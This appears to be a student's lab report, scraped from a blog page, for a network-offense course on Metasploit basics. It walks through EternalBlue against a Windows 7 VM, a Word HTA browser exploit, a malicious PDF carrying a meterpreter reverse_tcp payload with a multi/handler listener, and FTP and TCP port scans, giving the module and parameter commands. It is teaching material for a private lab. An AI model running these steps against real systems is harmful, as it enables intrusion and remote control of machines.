2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础
1. 实践内容(3.5分)
1.1一个主动攻击实践
攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
永恒之蓝漏洞是利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
进入msfconsole
输入 use exploit/windows/smb/ms17_010_eternalblue
。并且通过show payloads
显示可用攻击载荷。
设置tcp反向连接:
设置参数:
输入:exploit
渗透成功:
1.2 一个针对浏览器的攻击
攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
我们先启动msfconsole
并使用模块use exploit/windows/fileformat/office_word_hta
查看目标show targets
show options
,可以看到已经默认帮我们配置好了,我们只需要run
执行即可,相应的产生了一个URL。
在靶机的IE浏览器中输入KALI中生成的URL,出现一个窗口,点击运行即可:
看到kali那里已经产生了session会话,我们按下回车回到命令行,使用sessions -i 1
来与第一个session
建立连接,再输入shell
拿到权限:
输入指令测试,渗透陈成功:
1.3 一个针对客户端的攻击(Adobe)
本次实验在win7中实验并没有成功,于是我将靶机换成XP系统。
查看靶机ip:
kali输入msfconsole
进入控制台,依次输入以下命令
攻击方:kali 192.168.21.130
靶机: win7 192.168.21.131
use windows/fileformat/adobe_cooltype_sing
:选择攻击模块
set payload windows/meterpreter/reverse_tcp
:设置tcp反向连接
set LHOST 192.168.21.130
:kali IP
set LPORT 5235
:设置攻击端口
set FILENAME 20165235.pdf
:设置生成的pdf文件名
exploit
:发起攻击
我是第二次做的时候截的屏,所以没有显示文件路径。将20165235.pdf复制到XP中。重启控制台,并且输入以下命令进入监听模块:
use exploit/multi/handler
:进入监听模块
set payload windows/meterpreter/reverse_tcp
:设置tcp反向连接
set LHOST 10.0.0.138
:kali IP
set LPORT 5330
:设置攻击端口
exploit
:监听
接着在XP中打开20165235.pdf文件:
渗透成功:
关闭20165235.pdf,连接断开:
1.4 成功应用任何一个辅助模块。
auxiliary/scanner/ftp/ftp_version
攻击方:kali 192.168.21.130
靶机: win7 192.169.21.128
本次的模块是通过MSF渗透帮助手册中找到的。功能是可以查询到某一网段中的ftp服务器以及其操作系统的类型。
首先在win7中搭建一个ftp服务器,具体的过程可以上网查找。一下是搭建好的ftp服务器:
测试ftp服务器是否可用:
进入msfconsole
,输入use auxiliary/scanner/ftp/ftp_version
,设置要扫描的网段范围:set RHOSTS 192.168.21.1-254
,设置线程数:set THREADS 55
,(线程数是每次扫描的主机个数。),直接输入run
即可看到结果:192.168.21.128:被扫描出来,并分析出是微软的Windows操作系统。
auxiliary/scanner/portscan/tcp
攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
创建msf所需的数据库:
service postgresql start
msfdb start
进入msfconsole
,使用auxiliary/scanner/portscan/tcp
模块,用来扫描靶机的TCP端口使用情况。执行命令use auxiliary/scanner/portscan/tcp
进入并使用模块:输入show options
查看需要设置的参数信息:
设置参数:set RHOSTS 192.168.21.128
,set PROTS 1 - 5235
(扫描1到5235端口),之后使用run
,进行扫描。
2 报告内容:
2.1.基础问题回答
(1)用自己的话解释什么是exploit,payload,encode.
- exploit:exploit字面上的意思是“开拓、开发”,exploit就是利用一切可以利用的工具、采用一切可以采用的方法、找到一切可以找到的漏洞,并且通过对漏洞资料的分析研究,从而达到获取网站用户资料文档、添加自定义用户、甚至侵入网站获得管理员权限控制整个网站的最终目的。但是在MSF中,exploit将负责攻击的代码payload传送到靶机中。
- payload:payload是指:有效载荷。它是靶机被渗透攻击之后执行的恶意代码。
encode:是编码的意思。将payload进行多次编码后,使改变其形态。
2.2.实践总结与体会
通过本次的实践,学会了利用MSF进行多种方式的渗透,不敢说能灵活应用并且实战,但是学到了不少东西。在进行实验时,网上的资料太少,而且对好多模块并不知道它的意思以及用法,于是我就翻出它的英文帮助手册,利用翻译软件看懂了使用方法。在以后的学习过程中一定要活学活用。
2.3.离实战还缺些什么技术或步骤
首先是攻击手法单一,应用不灵活,在实战中要求使用多种方法,学会去扫描靶机的漏洞以及可用的端口等。要真正的应用于实战就要我们能灵活的使用MSF提供的大部分的攻击手段,同时也得学会使用其他的攻击平台。
2018-2019 20165235 网络对抗 Exp5 MSF基础的更多相关文章
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019 20165220 网络对抗 Exp5 MSF基础
实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...
- 2018-2019 20165219 网络对抗 Exp5 MSF基础
实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...
- 20145338 《网络对抗》 MSF基础应用
20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...
- 20145308 《网络对抗》 MSF基础应用 学习总结
20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...
- 20145326蔡馨熤《网络对抗》——MSF基础应用
20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...
- 20155218《网络对抗》MSF基础应用
20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...
- 20155304《网络对抗》MSF基础应用
20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...
随机推荐
- redis5.0.3单实例简单安装记录
redis5.0.3单实例简单安装记录 日常需要测试使用,索性记录下来,免得临时又麻烦的找资料. yum -y install make gcc-c++ cmake bison-devel ncurs ...
- localhost,127.x.x.x和 0.0.0.0区别
之前遇到过一件很纳闷的事,明明用webpack-dev-server监听了一个端口xx,用localhost:xx可以打开,但是依然可以在localhost:xx来启动另一个服务. 后来我看来了下we ...
- C语言博客05--指针
C语言博客05--指针 1.本章学习总结 1.1 思维导图 1.2 本章学习体会及代码量学习体会 1.2.1 学习体会 在本周的学习过程中,我们学习了指针的用法.说实话,指针的用法有点绕,之前一直没搞 ...
- 转载---JavaScript执行机制
很好的一篇文章,原地址 JavaScript执行机制 这一次,彻底弄懂 JavaScript 执行机制 本文的目的就是要保证你彻底弄懂javascript的执行机制,如果读完本文还不懂,可以揍我. 不 ...
- 1. Nagios和 NagiosQL安装及配置
目录 1. Nagios 和 NagiosQL简介 2. Nagios+NagiosQL搭建环境说明 3. Nagios.Nagios-plugins和NagiosQL的安装 4. 配置NagiosQ ...
- 内存屏障和volatile内存语义的实现
趁周末,把以前的书拿出来,再翻一番,顺便做个笔记: 内存屏障:用来控制和规范cpu对内存操作的顺序的cpu指令. 内存屏障列表: 1.loadload:确保“前者数据装载”先于“后者装载指令”: 2. ...
- redis集群篇
redis集群的搭建 1.为什么要搭建集群(解决单点问题) 通过对redis的简单了解,我们知道redis已经有两种持久化方案rdb和aof.在redis出现宕机后,可能会出现部分的数据损失,但是数据 ...
- iOS 开发 ZFUI framework控件,使布局更简单
来自:http://www.jianshu.com/p/bcf86b170d9c 前言 为什么会写这个?因为在iOS开发中,界面的布局一直没有Android布局有那么多的方法和优势,我个人开发都是纯代 ...
- Linux中查看端口占用情况
1.lsof -i:端口号 用于查看某一端口的占用情况,比如查看8000端口的使用情况: # lsof -i:8000 2.netstat -tunlp | grep 端口号,用于查看指定的端口号的进 ...
- docker保存日志文件到本地
其实很简单 docker logs +你需要添加的额外参数 + 容器id >文件名称 然后查看这个文件就可以了,也可以通过ftp协议下载到本地